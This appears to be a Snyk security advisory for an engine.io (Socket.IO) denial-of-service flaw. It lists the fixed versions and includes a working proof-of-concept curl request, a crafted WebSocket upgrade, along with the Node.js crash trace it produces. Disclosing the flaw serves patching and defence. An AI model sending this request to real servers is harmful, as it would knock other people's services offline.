Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade engine.io
to version 4.1.2, 5.2.1, 6.1.1 or higher.
engine.io is a realtime engine behind Socket.IO. It provides the foundation of a bidirectional connection between client and server
Affected versions of this package are vulnerable to Uncaught Exception by sending a specially crafted HTTP request, that triggers an uncaught exception and kills the Node.js
process that runs an Engine.IO or a Socket.IO server.
With an Engine.IO server running on port 3000:
curl -X 'GET' -H $'Connection: Upgrade' -H $'Upgrade: websocket' -H $'Sec-WebSocket-Version: 13' -H $'Sec-WebSocket-Key: DXR4dX615eRds8nRmlhqtw==' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 27' --data-binary 'app=cae417iahm&_method=POST' 'http://localhost:3000/engine.io/?EIO=4&transport=websocket'
//Output:
node:events:368 throw er; // Unhandled 'error' event ^
RangeError: Invalid WebSocket frame: RSV2 and RSV3 must be clear at Receiver.getInfo (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:176:14) at Receiver.startLoop (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:136:22) at Receiver._write (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/receiver.js:83:10) at writeOrBuffer (node:internal/streams/writable:389:12) at _write (node:internal/streams/writable:330:10) at Receiver.Writable.write (node:internal/streams/writable:334:10) at Socket.socketOnData (/home/damien/git/socket.io/socket.io-fiddle/node_modules/ws/lib/websocket.js:1116:35) at Socket.emit (node:events:390:28) at Socket.Readable.read (node:internal/streams/readable:527:10) at Socket.read (node:net:644:39)